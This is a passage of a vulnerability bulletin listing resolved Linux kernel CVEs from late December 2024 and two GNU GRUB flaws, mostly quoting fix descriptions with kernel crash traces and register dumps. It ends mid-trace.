In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: Fix the memory allocation issue in amdgpu_discovery_get_nps_info() Fix two issues with memory allocation in amdgpu_discovery_get_nps_info() for mem_ranges: - Add a check for allocation failure to avoid dereferencing a null pointer. - As suggested by Christophe, use kvcalloc() for memory allocation, which checks for multiplication overflow. Additionally, assign the output parameters nps_type and range_cnt after the kvcalloc() call to prevent modifying the output parameters in case of an error return. | 2024-12-28 | not yet calculated | CVE-2024-56697 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: usb: dwc3: gadget: Fix looping of queued SG entries The dwc3_request->num_queued_sgs is decremented on completion. If a partially completed request is handled, then the dwc3_request->num_queued_sgs no longer reflects the total number of num_queued_sgs (it would be cleared). Correctly check the number of request SG entries remained to be prepare and queued. Failure to do this may cause null pointer dereference when accessing non-existent SG entry. | 2024-12-28 | not yet calculated | CVE-2024-56698 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: s390/pci: Fix potential double remove of hotplug slot In commit 6ee600bfbe0f ("s390/pci: remove hotplug slot when releasing the device") the zpci_exit_slot() was moved from zpci_device_reserved() to zpci_release_device() with the intention of keeping the hotplug slot around until the device is actually removed. Now zpci_release_device() is only called once all references are dropped. Since the zPCI subsystem only drops its reference once the device is in the reserved state it follows that zpci_release_device() must only deal with devices in the reserved state. Despite that it contains code to tear down from both configured and standby state. For the standby case this already includes the removal of the hotplug slot so would cause a double removal if a device was ever removed in either configured or standby state. Instead of causing a potential double removal in a case that should never happen explicitly WARN_ON() if a device in non-reserved state is released and get rid of the dead code cases. | 2024-12-28 | not yet calculated | CVE-2024-56699 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: media: wl128x: Fix atomicity violation in fmc_send_cmd() Atomicity violation occurs when the fmc_send_cmd() function is executed simultaneously with the modification of the fmdev->resp_skb value. Consider a scenario where, after passing the validity check within the function, a non-null fmdev->resp_skb variable is assigned a null value. This results in an invalid fmdev->resp_skb variable passing the validity check. As seen in the later part of the function, skb = fmdev->resp_skb; when the invalid fmdev->resp_skb passes the check, a null pointer dereference error may occur at line 478, evt_hdr = (void *)skb->data; To address this issue, it is recommended to include the validity check of fmdev->resp_skb within the locked section of the function. This modification ensures that the value of fmdev->resp_skb does not change during the validation process, thereby maintaining its validity. This possible bug is found by an experimental static analysis tool developed by our team. This tool analyzes the locking APIs to extract function pairs that can be concurrently executed, and then analyzes the instructions in the paired functions to identify possible concurrency bugs including data races and atomicity violations. | 2024-12-28 | not yet calculated | CVE-2024-56700 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: powerpc/pseries: Fix dtl_access_lock to be a rw_semaphore The dtl_access_lock needs to be a rw_sempahore, a sleeping lock, because the code calls kmalloc() while holding it, which can sleep: # echo 1 > /proc/powerpc/vcpudispatch_stats BUG: sleeping function called from invalid context at include/linux/sched/mm.h:337 in_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 199, name: sh preempt_count: 1, expected: 0 3 locks held by sh/199: #0: c00000000a0743f8 (sb_writers#3){.+.+}-{0:0}, at: vfs_write+0x324/0x438 #1: c0000000028c7058 (dtl_enable_mutex){+.+.}-{3:3}, at: vcpudispatch_stats_write+0xd4/0x5f4 #2: c0000000028c70b8 (dtl_access_lock){+.+.}-{2:2}, at: vcpudispatch_stats_write+0x220/0x5f4 CPU: 0 PID: 199 Comm: sh Not tainted 6.10.0-rc4 #152 Hardware name: IBM pSeries (emulated by qemu) POWER9 (raw) 0x4e1202 0xf000005 of:SLOF,HEAD hv:linux,kvm pSeries Call Trace: dump_stack_lvl+0x130/0x148 (unreliable) __might_resched+0x174/0x410 kmem_cache_alloc_noprof+0x340/0x3d0 alloc_dtl_buffers+0x124/0x1ac vcpudispatch_stats_write+0x2a8/0x5f4 proc_reg_write+0xf4/0x150 vfs_write+0xfc/0x438 ksys_write+0x88/0x148 system_call_exception+0x1c4/0x5a0 system_call_common+0xf4/0x258 | 2024-12-28 | not yet calculated | CVE-2024-56701 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: bpf: Mark raw_tp arguments with PTR_MAYBE_NULL Arguments to a raw tracepoint are tagged as trusted, which carries the semantics that the pointer will be non-NULL. However, in certain cases, a raw tracepoint argument may end up being NULL. More context about this issue is available in [0]. Thus, there is a discrepancy between the reality, that raw_tp arguments can actually be NULL, and the verifier's knowledge, that they are never NULL, causing explicit NULL checks to be deleted, and accesses to such pointers potentially crashing the kernel. To fix this, mark raw_tp arguments as PTR_MAYBE_NULL, and then special case the dereference and pointer arithmetic to permit it, and allow passing them into helpers/kfuncs; these exceptions are made for raw_tp programs only. Ensure that we don't do this when ref_obj_id > 0, as in that case this is an acquired object and doesn't need such adjustment. The reason we do mask_raw_tp_trusted_reg logic is because other will recheck in places whether the register is a trusted_reg, and then consider our register as untrusted when detecting the presence of the PTR_MAYBE_NULL flag. To allow safe dereference, we enable PROBE_MEM marking when we see loads into trusted pointers with PTR_MAYBE_NULL. While trusted raw_tp arguments can also be passed into helpers or kfuncs where such broken assumption may cause issues, a future patch set will tackle their case separately, as PTR_TO_BTF_ID (without PTR_TRUSTED) can already be passed into helpers and causes similar problems. Thus, they are left alone for now. It is possible that these checks also permit passing non-raw_tp args that are trusted PTR_TO_BTF_ID with null marking. In such a case, allowing dereference when pointer is NULL expands allowed behavior, so won't regress existing programs, and the case of passing these into helpers is the same as above and will be dealt with later. Also update the failure case in tp_btf_nullable selftest to capture the new behavior, as the verifier will no longer cause an error when directly dereference a raw tracepoint argument marked as __nullable. [0]: https://lore.kernel.org/bpf/ZrCZS6nisraEqehw@jlelli-thinkpadt14gen4.remote.csb | 2024-12-28 | not yet calculated | CVE-2024-56702 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ipv6: Fix soft lockups in fib6_select_path under high next hop churn Soft lockups have been observed on a cluster of Linux-based edge routers located in a highly dynamic environment. Using the `bird` service, these routers continuously update BGP-advertised routes due to frequently changing nexthop destinations, while also managing significant IPv6 traffic. The lockups occur during the traversal of the multipath circular linked-list in the `fib6_select_path` function, particularly while iterating through the siblings in the list. The issue typically arises when the nodes of the linked list are unexpectedly deleted concurrently on a different core-indicated by their 'next' and 'previous' elements pointing back to the node itself and their reference count dropping to zero. This results in an infinite loop, leading to a soft lockup that triggers a system panic via the watchdog timer. Apply RCU primitives in the problematic code sections to resolve the issue. Where necessary, update the references to fib6_siblings to annotate or use the RCU APIs. Include a test script that reproduces the issue. The script periodically updates the routing table while generating a heavy load of outgoing IPv6 traffic through multiple iperf3 clients. It consistently induces infinite soft lockups within a couple of minutes. Kernel log: 0 [ffffbd13003e8d30] machine_kexec at ffffffff8ceaf3eb 1 [ffffbd13003e8d90] __crash_kexec at ffffffff8d0120e3 2 [ffffbd13003e8e58] panic at ffffffff8cef65d4 3 [ffffbd13003e8ed8] watchdog_timer_fn at ffffffff8d05cb03 4 [ffffbd13003e8f08] __hrtimer_run_queues at ffffffff8cfec62f 5 [ffffbd13003e8f70] hrtimer_interrupt at ffffffff8cfed756 6 [ffffbd13003e8fd0] __sysvec_apic_timer_interrupt at ffffffff8cea01af 7 [ffffbd13003e8ff0] sysvec_apic_timer_interrupt at ffffffff8df1b83d -- <IRQ stack> -- 8 [ffffbd13003d3708] asm_sysvec_apic_timer_interrupt at ffffffff8e000ecb [exception RIP: fib6_select_path+299] RIP: ffffffff8ddafe7b RSP: ffffbd13003d37b8 RFLAGS: 00000287 RAX: ffff975850b43600 RBX: ffff975850b40200 RCX: 0000000000000000 RDX: 000000003fffffff RSI: 0000000051d383e4 RDI: ffff975850b43618 RBP: ffffbd13003d3800 R8: 0000000000000000 R9: ffff975850b40200 R10: 0000000000000000 R11: 0000000000000000 R12: ffffbd13003d3830 R13: ffff975850b436a8 R14: ffff975850b43600 R15: 0000000000000007 ORIG_RAX: ffffffffffffffff CS: 0010 SS: 0018 9 [ffffbd13003d3808] ip6_pol_route at ffffffff8ddb030c 10 [ffffbd13003d3888] ip6_pol_route_input at ffffffff8ddb068c 11 [ffffbd13003d3898] fib6_rule_lookup at ffffffff8ddf02b5 12 [ffffbd13003d3928] ip6_route_input at ffffffff8ddb0f47 13 [ffffbd13003d3a18] ip6_rcv_finish_core.constprop.0 at ffffffff8dd950d0 14 [ffffbd13003d3a30] ip6_list_rcv_finish.constprop.0 at ffffffff8dd96274 15 [ffffbd13003d3a98] ip6_sublist_rcv at ffffffff8dd96474 16 [ffffbd13003d3af8] ipv6_list_rcv at ffffffff8dd96615 17 [ffffbd13003d3b60] __netif_receive_skb_list_core at ffffffff8dc16fec 18 [ffffbd13003d3be0] netif_receive_skb_list_internal at ffffffff8dc176b3 19 [ffffbd13003d3c50] napi_gro_receive at ffffffff8dc565b9 20 [ffffbd13003d3c80] ice_receive_skb at ffffffffc087e4f5 [ice] 21 [ffffbd13003d3c90] ice_clean_rx_irq at ffffffffc0881b80 [ice] 22 [ffffbd13003d3d20] ice_napi_poll at ffffffffc088232f [ice] 23 [ffffbd13003d3d80] __napi_poll at ffffffff8dc18000 24 [ffffbd13003d3db8] net_rx_action at ffffffff8dc18581 25 [ffffbd13003d3e40] __do_softirq at ffffffff8df352e9 26 [ffffbd13003d3eb0] run_ksoftirqd at ffffffff8ceffe47 27 [ffffbd13003d3ec0] smpboot_thread_fn at ffffffff8cf36a30 28 [ffffbd13003d3ee8] kthread at ffffffff8cf2b39f 29 [ffffbd13003d3f28] ret_from_fork at ffffffff8ce5fa64 30 [ffffbd13003d3f50] ret_from_fork_asm at ffffffff8ce03cbb | 2024-12-28 | not yet calculated | CVE-2024-56703 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: 9p/xen: fix release of IRQ Kernel logs indicate an IRQ was double-freed. Pass correct device ID during IRQ release. [Dominique: remove confusing variable reset to 0] | 2024-12-28 | not yet calculated | CVE-2024-56704 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: media: atomisp: Add check for rgby_data memory allocation failure In ia_css_3a_statistics_allocate(), there is no check on the allocation result of the rgby_data memory. If rgby_data is not successfully allocated, it may trigger the assert(host_stats->rgby_data) assertion in ia_css_s3a_hmem_decode(). Adding a check to fix this potential issue. | 2024-12-28 | not yet calculated | CVE-2024-56705 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: s390/cpum_sf: Fix and protect memory allocation of SDBs with mutex Reservation of the PMU hardware is done at first event creation and is protected by a pair of mutex_lock() and mutex_unlock(). After reservation of the PMU hardware the memory required for the PMUs the event is to be installed on is allocated by allocate_buffers() and alloc_sampling_buffer(). This done outside of the mutex protection. Without mutex protection two or more concurrent invocations of perf_event_init() may run in parallel. This can lead to allocation of Sample Data Blocks (SDBs) multiple times for the same PMU. Prevent this and protect memory allocation of SDBs by mutex. | 2024-12-28 | not yet calculated | CVE-2024-56706 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: octeontx2-pf: handle otx2_mbox_get_rsp errors in otx2_dmac_flt.c Add error pointer checks after calling otx2_mbox_get_rsp(). | 2024-12-28 | not yet calculated | CVE-2024-56707 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: EDAC/igen6: Avoid segmentation fault on module unload The segmentation fault happens because: During modprobe: 1. In igen6_probe(), igen6_pvt will be allocated with kzalloc() 2. In igen6_register_mci(), mci->pvt_info will point to &igen6_pvt->imc[mc] During rmmod: 1. In mci_release() in edac_mc.c, it will kfree(mci->pvt_info) 2. In igen6_remove(), it will kfree(igen6_pvt); Fix this issue by setting mci->pvt_info to NULL to avoid the double kfree. | 2024-12-28 | not yet calculated | CVE-2024-56708 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: io_uring: check if iowq is killed before queuing task work can be executed after the task has gone through io_uring termination, whether it's the final task_work run or the fallback path. In this case, task work will find ->io_wq being already killed and null'ed, which is a problem if it then tries to forward the request to io_queue_iowq(). Make io_queue_iowq() fail requests in this case. Note that it also checks PF_KTHREAD, because the user can first close a DEFER_TASKRUN ring and shortly after kill the task, in which case ->iowq check would race. | 2024-12-29 | not yet calculated | CVE-2024-56709 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ceph: fix memory leak in ceph_direct_read_write() The bvecs array which is allocated in iter_get_bvecs_alloc() is leaked and pages remain pinned if ceph_alloc_sparse_ext_map() fails. There is no need to delay the allocation of sparse_ext map until after the bvecs array is set up, so fix this by moving sparse_ext allocation a bit earlier. Also, make a similar adjustment in __ceph_sync_read() for consistency (a leak of the same kind in __ceph_sync_read() has been addressed differently). | 2024-12-29 | not yet calculated | CVE-2024-56710 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: drm/panel: himax-hx83102: Add a check to prevent NULL pointer dereference drm_mode_duplicate() could return NULL due to lack of memory, which will then call NULL pointer dereference. Add a check to prevent it. | 2024-12-29 | not yet calculated | CVE-2024-56711 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: udmabuf: fix memory leak on last export_udmabuf() error path In export_udmabuf(), if dma_buf_fd() fails because the FD table is full, a dma_buf owning the udmabuf has already been created; but the error handling in udmabuf_create() will tear down the udmabuf without doing anything about the containing dma_buf. This leaves a dma_buf in memory that contains a dangling pointer; though that doesn't seem to lead to anything bad except a memory leak. Fix it by moving the dma_buf_fd() call out of export_udmabuf() so that we can give it different error handling. Note that the shape of this code changed a lot in commit 5e72b2b41a21 ("udmabuf: convert udmabuf driver to use folios"); but the memory leak seems to have existed since the introduction of udmabuf. | 2024-12-29 | not yet calculated | CVE-2024-56712 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net: netdevsim: fix nsim_pp_hold_write() nsim_pp_hold_write() has two problems: 1) It may return with rtnl held, as found by syzbot. 2) Its return value does not propagate an error if any. | 2024-12-29 | not yet calculated | CVE-2024-56713 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ionic: no double destroy workqueue There are some FW error handling paths that can cause us to try to destroy the workqueue more than once, so let's be sure we're checking for that. The case where this popped up was in an AER event where the handlers got called in such a way that ionic_reset_prepare() and thus ionic_dev_teardown() got called twice in a row. The second time through the workqueue was already destroyed, and destroy_workqueue() choked on the bad wq pointer. We didn't hit this in AER handler testing before because at that time we weren't using a private workqueue. Later we replaced the use of the system workqueue with our own private workqueue but hadn't rerun the AER handler testing since then. | 2024-12-29 | not yet calculated | CVE-2024-56714 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ionic: Fix netdev notifier unregister on failure If register_netdev() fails, then the driver leaks the netdev notifier. Fix this by calling ionic_lif_unregister() on register_netdev() failure. This will also call ionic_lif_unregister_phc() if it has already been registered. | 2024-12-29 | not yet calculated | CVE-2024-56715 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: netdevsim: prevent bad user input in nsim_dev_health_break_write() If either a zero count or a large one is provided, kernel can crash. | 2024-12-29 | not yet calculated | CVE-2024-56716 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net: mscc: ocelot: fix incorrect IFH SRC_PORT field in ocelot_ifh_set_basic() Packets injected by the CPU should have a SRC_PORT field equal to the CPU port module index in the Analyzer block (ocelot->num_phys_ports). The blamed commit copied the ocelot_ifh_set_basic() call incorrectly from ocelot_xmit_common() in net/dsa/tag_ocelot.c. Instead of calling with "x", it calls with BIT_ULL(x), but the field is not a port mask, but rather a single port index. [ side note: this is the technical debt of code duplication :( ] The error used to be silent and doesn't appear to have other user-visible manifestations, but with new changes in the packing library, it now fails loudly as follows: ------------[ cut here ]------------ Cannot store 0x40 inside bits 46-43 - will truncate sja1105 spi2.0: xmit timed out WARNING: CPU: 1 PID: 102 at lib/packing.c:98 __pack+0x90/0x198 sja1105 spi2.0: timed out polling for tstamp CPU: 1 UID: 0 PID: 102 Comm: felix_xmit Tainted: G W N 6.13.0-rc1-00372-gf706b85d972d-dirty #2605 Call trace: __pack+0x90/0x198 (P) __pack+0x90/0x198 (L) packing+0x78/0x98 ocelot_ifh_set_basic+0x260/0x368 ocelot_port_inject_frame+0xa8/0x250 felix_port_deferred_xmit+0x14c/0x258 kthread_worker_fn+0x134/0x350 kthread+0x114/0x138 The code path pertains to the ocelot switchdev driver and to the felix secondary DSA tag protocol, ocelot-8021q. Here seen with ocelot-8021q. The messenger (packing) is not really to blame, so fix the original commit instead. | 2024-12-29 | not yet calculated | CVE-2024-56717 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net/smc: protect link down work from execute after lgr freed link down work may be scheduled before lgr freed but execute after lgr freed, which may result in crash. So it is need to hold a reference before shedule link down work, and put the reference after work executed or canceled. The relevant crash call stack as follows: list_del corruption. prev->next should be ffffb638c9c0fe20, but was 0000000000000000 ------------[ cut here ]------------ kernel BUG at lib/list_debug.c:51! invalid opcode: 0000 [#1] SMP NOPTI CPU: 6 PID: 978112 Comm: kworker/6:119 Kdump: loaded Tainted: G #1 Hardware name: Alibaba Cloud Alibaba Cloud ECS, BIOS 2221b89 04/01/2014 Workqueue: events smc_link_down_work [smc] RIP: 0010:__list_del_entry_valid.cold+0x31/0x47 RSP: 0018:ffffb638c9c0fdd8 EFLAGS: 00010086 RAX: 0000000000000054 RBX: ffff942fb75e5128 RCX: 0000000000000000 RDX: ffff943520930aa0 RSI: ffff94352091fc80 RDI: ffff94352091fc80 RBP: 0000000000000000 R08: 0000000000000000 R09: ffffb638c9c0fc38 R10: ffffb638c9c0fc30 R11: ffffffffa015eb28 R12: 0000000000000002 R13: ffffb638c9c0fe20 R14: 0000000000000001 R15: ffff942f9cd051c0 FS: 0000000000000000(0000) GS:ffff943520900000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f4f25214000 CR3: 000000025fbae004 CR4: 00000000007706e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 PKRU: 55555554 Call Trace: rwsem_down_write_slowpath+0x17e/0x470 smc_link_down_work+0x3c/0x60 [smc] process_one_work+0x1ac/0x350 worker_thread+0x49/0x2f0 ? rescuer_thread+0x360/0x360 kthread+0x118/0x140 ? __kthread_bind_mask+0x60/0x60 ret_from_fork+0x1f/0x30 | 2024-12-29 | not yet calculated | CVE-2024-56718 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net: stmmac: fix TSO DMA API usage causing oops Commit 66600fac7a98 ("net: stmmac: TSO: Fix unbalanced DMA map/unmap for non-paged SKB data") moved the assignment of tx_skbuff_dma[]'s members to be later in stmmac_tso_xmit(). The buf (dma cookie) and len stored in this structure are passed to dma_unmap_single() by stmmac_tx_clean(). The DMA API requires that the dma cookie passed to dma_unmap_single() is the same as the value returned from dma_map_single(). However, by moving the assignment later, this is not the case when priv->dma_cap.addr64 > 32 as "des" is offset by proto_hdr_len. This causes problems such as: dwc-eth-dwmac 2490000.ethernet eth0: Tx DMA map failed and with DMA_API_DEBUG enabled: DMA-API: dwc-eth-dwmac 2490000.ethernet: device driver tries to +free DMA memory it has not allocated [device address=0x000000ffffcf65c0] [size=66 bytes] Fix this by maintaining "des" as the original DMA cookie, and use tso_des to pass the offset DMA cookie to stmmac_tso_allocator(). Full details of the crashes can be found at: https://lore.kernel.org/all/d8112193-0386-4e14-b516-37c2d838171a@nvidia.com/ https://lore.kernel.org/all/klkzp5yn5kq5efgtrow6wbvnc46bcqfxs65nz3qy77ujr5turc@bwwhelz2l4dw/ | 2024-12-29 | not yet calculated | CVE-2024-56719 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: bpf, sockmap: Several fixes to bpf_msg_pop_data Several fixes to bpf_msg_pop_data, 1. In sk_msg_shift_left, we should put_page 2. if (len == 0), return early is better 3. pop the entire sk_msg (last == msg->sg.size) should be supported 4. Fix for the value of variable "a" 5. In sk_msg_shift_left, after shifting, i has already pointed to the next element. Addtional sk_msg_iter_var_next may result in BUG. | 2024-12-29 | not yet calculated | CVE-2024-56720 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: x86/CPU/AMD: Terminate the erratum_1386_microcode array The erratum_1386_microcode array requires an empty entry at the end. Otherwise x86_match_cpu_with_stepping() will continue iterate the array after it ended. Add an empty entry to erratum_1386_microcode to its end. | 2024-12-29 | not yet calculated | CVE-2024-56721 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: RDMA/hns: Fix cpu stuck caused by printings during reset During reset, cmd to destroy resources such as qp, cq, and mr may fail, and error logs will be printed. When a large number of resources are destroyed, there will be lots of printings, and it may lead to a cpu stuck. Delete some unnecessary printings and replace other printing functions in these paths with the ratelimited version. | 2024-12-29 | not yet calculated | CVE-2024-56722 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: mfd: intel_soc_pmic_bxtwc: Use IRQ domain for PMIC devices While design wise the idea of converting the driver to use the hierarchy of the IRQ chips is correct, the implementation has (inherited) flaws. This was unveiled when platform_get_irq() had started WARN() on IRQ 0 that is supposed to be a Linux IRQ number (also known as vIRQ). Rework the driver to respect IRQ domain when creating each MFD device separately, as the domain is not the same for all of them. | 2024-12-29 | not yet calculated | CVE-2024-56723 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: mfd: intel_soc_pmic_bxtwc: Use IRQ domain for TMU device While design wise the idea of converting the driver to use the hierarchy of the IRQ chips is correct, the implementation has (inherited) flaws. This was unveiled when platform_get_irq() had started WARN() on IRQ 0 that is supposed to be a Linux IRQ number (also known as vIRQ). Rework the driver to respect IRQ domain when creating each MFD device separately, as the domain is not the same for all of them. | 2024-12-29 | not yet calculated | CVE-2024-56724 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: octeontx2-pf: handle otx2_mbox_get_rsp errors in otx2_dcbnl.c Add error pointer check after calling otx2_mbox_get_rsp(). | 2024-12-29 | not yet calculated | CVE-2024-56725 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: octeontx2-pf: handle otx2_mbox_get_rsp errors in cn10k.c Add error pointer check after calling otx2_mbox_get_rsp(). | 2024-12-29 | not yet calculated | CVE-2024-56726 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: octeontx2-pf: handle otx2_mbox_get_rsp errors in otx2_flows.c Adding error pointer check after calling otx2_mbox_get_rsp(). | 2024-12-29 | not yet calculated | CVE-2024-56727 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: octeontx2-pf: handle otx2_mbox_get_rsp errors in otx2_ethtool.c Add error pointer check after calling otx2_mbox_get_rsp(). | 2024-12-29 | not yet calculated | CVE-2024-56728 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: smb: Initialize cfid->tcon before performing network ops Avoid leaking a tcon ref when a lease break races with opening the cached directory. Processing the leak break might take a reference to the tcon in cached_dir_lease_break() and then fail to release the ref in cached_dir_offload_close, since cfid->tcon is still NULL. | 2024-12-29 | not yet calculated | CVE-2024-56729 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net/9p/usbg: fix handling of the failed kzalloc() memory allocation On the linux-next, next-20241108 vanilla kernel, the coccinelle tool gave the following error report: ./net/9p/trans_usbg.c:912:5-11: ERROR: allocation function on line 911 returns NULL not ERR_PTR on failure kzalloc() failure is fixed to handle the NULL return case on the memory exhaustion. | 2024-12-29 | not yet calculated | CVE-2024-56730 |
| n/a -- n/a |
GNU GRUB (aka GRUB2) through 2.12 has a heap-based buffer overflow in fs/hfs.c via crafted sblock data in an HFS filesystem. | 2024-12-29 | not yet calculated | CVE-2024-56737 |
| n/a -- n/a |
GNU GRUB (aka GRUB2) through 2.12 does not use a constant-time algorithm for grub_crypto_memcmp and thus allows side-channel attacks. | 2024-12-29 | not yet calculated | CVE-2024-56738 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: rtc: check if __rtc_read_time was successful in rtc_timer_do_work() If the __rtc_read_time call fails,, the struct rtc_time tm; may contain uninitialized data, or an illegal date/time read from the RTC hardware. When calling rtc_tm_to_ktime later, the result may be a very large value (possibly KTIME_MAX). If there are periodic timers in rtc->timerqueue, they will continually expire, may causing kernel softlockup. | 2024-12-29 | not yet calculated | CVE-2024-56739 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: nfs/localio: must clear res.replen in nfs_local_read_done Otherwise memory corruption can occur due to NFSv3 LOCALIO reads leaving garbage in res.replen: - nfs3_read_done() copies that into server->read_hdrsize; from there nfs3_proc_read_setup() copies it to args.replen in new requests. - nfs3_xdr_enc_read3args() passes that to rpc_prepare_reply_pages() which includes it in hdrsize for xdr_init_pages, so that rq_rcv_buf contains a ridiculous len. - This is copied to rq_private_buf and xs_read_stream_request() eventually passes the kvec to sock_recvmsg() which receives incoming data into entirely the wrong place. This is easily reproduced with NFSv3 LOCALIO that is servicing reads when it is made to pivot back to using normal RPC. This switch back to using normal NFSv3 with RPC can occur for a few reasons but this issue was exposed with a test that stops and then restarts the NFSv3 server while LOCALIO is performing heavy read IO. | 2024-12-29 | not yet calculated | CVE-2024-56740 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: apparmor: test: Fix memory leak for aa_unpack_strdup() The string allocated by kmemdup() in aa_unpack_strdup() is not freed and cause following memory leaks, free them to fix it. unreferenced object 0xffffff80c6af8a50 (size 8): comm "kunit_try_catch", pid 225, jiffies 4294894407 hex dump (first 8 bytes): 74 65 73 74 69 6e 67 00 testing. backtrace (crc 5eab668b): [<0000000001e3714d>] kmemleak_alloc+0x34/0x40 [<000000006e6c7776>] __kmalloc_node_track_caller_noprof+0x300/0x3e0 [<000000006870467c>] kmemdup_noprof+0x34/0x60 [<000000001176bb03>] aa_unpack_strdup+0xd0/0x18c [<000000008ecde918>] policy_unpack_test_unpack_strdup_with_null_name+0xf8/0x3ec [<0000000032ef8f77>] kunit_try_run_case+0x13c/0x3ac [<00000000f3edea23>] kunit_generic_run_threadfn_adapter+0x80/0xec [<00000000adf936cf>] kthread+0x2e8/0x374 [<0000000041bb1628>] ret_from_fork+0x10/0x20 unreferenced object 0xffffff80c2a29090 (size 8): comm "kunit_try_catch", pid 227, jiffies 4294894409 hex dump (first 8 bytes): 74 65 73 74 69 6e 67 00 testing. backtrace (crc 5eab668b): [<0000000001e3714d>] kmemleak_alloc+0x34/0x40 [<000000006e6c7776>] __kmalloc_node_track_caller_noprof+0x300/0x3e0 [<000000006870467c>] kmemdup_noprof+0x34/0x60 [<000000001176bb03>] aa_unpack_strdup+0xd0/0x18c [<0000000046a45c1a>] policy_unpack_test_unpack_strdup_with_name+0xd0/0x3c4 [<0000000032ef8f77>] kunit_try_run_case+0x13c/0x3ac [<00000000f3edea23>] kunit_generic_run_threadfn_adapter+0x80/0xec [<00000000adf936cf>] kthread+0x2e8/0x374 [<0000000041bb1628>] ret_from_fork+0x10/0x20 | 2024-12-29 | not yet calculated | CVE-2024-56741 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: vfio/mlx5: Fix an unwind issue in mlx5vf_add_migration_pages() Fix an unwind issue in mlx5vf_add_migration_pages(). If a set of pages is allocated but fails to be added to the SG table, they need to be freed to prevent a memory leak. Any pages successfully added to the SG table will be freed as part of mlx5vf_free_data_buffer(). | 2024-12-29 | not yet calculated | CVE-2024-56742 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: nfs_common: must not hold RCU while calling nfsd_file_put_local Move holding the RCU from nfs_to_nfsd_file_put_local to nfs_to_nfsd_net_put. It is the call to nfs_to->nfsd_serv_put that requires the RCU anyway (the puts for nfsd_file and netns were combined to avoid an extra indirect reference but that micro-optimization isn't possible now). This fixes xfstests generic/013 and it triggering: "Voluntary context switch within RCU read-side critical section!" [ 143.545738] Call Trace: [ 143.546206] <TASK> [ 143.546625] ? show_regs+0x6d/0x80 [ 143.547267] ? __warn+0x91/0x140 [ 143.547951] ? rcu_note_context_switch+0x496/0x5d0 [ 143.548856] ? report_bug+0x193/0x1a0 [ 143.549557] ? handle_bug+0x63/0xa0 [ 143.550214] ? exc_invalid_op+0x1d/0x80 [ 143.550938] ? asm_exc_invalid_op+0x1f/0x30 [ 143.551736] ? rcu_note_context_switch+0x496/0x5d0 [ 143.552634] ? wakeup_preempt+0x62/0x70 [ 143.553358] __schedule+0xaa/0x1380 [ 143.554025] ? _raw_spin_unlock_irqrestore+0x12/0x40 [ 143.554958] ? try_to_wake_up+0x1fe/0x6b0 [ 143.555715] ? wake_up_process+0x19/0x20 [ 143.556452] schedule+0x2e/0x120 [ 143.557066] schedule_preempt_disabled+0x19/0x30 [ 143.557933] rwsem_down_read_slowpath+0x24d/0x4a0 [ 143.558818] ? xfs_efi_item_format+0x50/0xc0 [xfs] [ 143.559894] down_read+0x4e/0xb0 [ 143.560519] xlog_cil_commit+0x1b2/0xbc0 [xfs] [ 143.561460] ? _raw_spin_unlock+0x12/0x30 [ 143.562212] ? xfs_inode_item_precommit+0xc7/0x220 [xfs] [ 143.563309] ? xfs_trans_run_precommits+0x69/0xd0 [xfs] [ 143.564394] __xfs_trans_commit+0xb5/0x330 [xfs] [ 143.565367] xfs_trans_roll+0x48/0xc0 [xfs] [ 143.566262] xfs_defer_trans_roll+0x57/0x100 [xfs] [ 143.567278] xfs_defer_finish_noroll+0x27a/0x490 [xfs] [ 143.568342] xfs_defer_finish+0x1a/0x80 [xfs] [ 143.569267] xfs_bunmapi_range+0x4d/0xb0 [xfs] [ 143.570208] xfs_itruncate_extents_flags+0x13d/0x230 [xfs] [ 143.571353] xfs_free_eofblocks+0x12e/0x190 [xfs] [ 143.572359] xfs_file_release+0x12d/0x140 [xfs] [ 143.573324] __fput+0xe8/0x2d0 [ 143.573922] 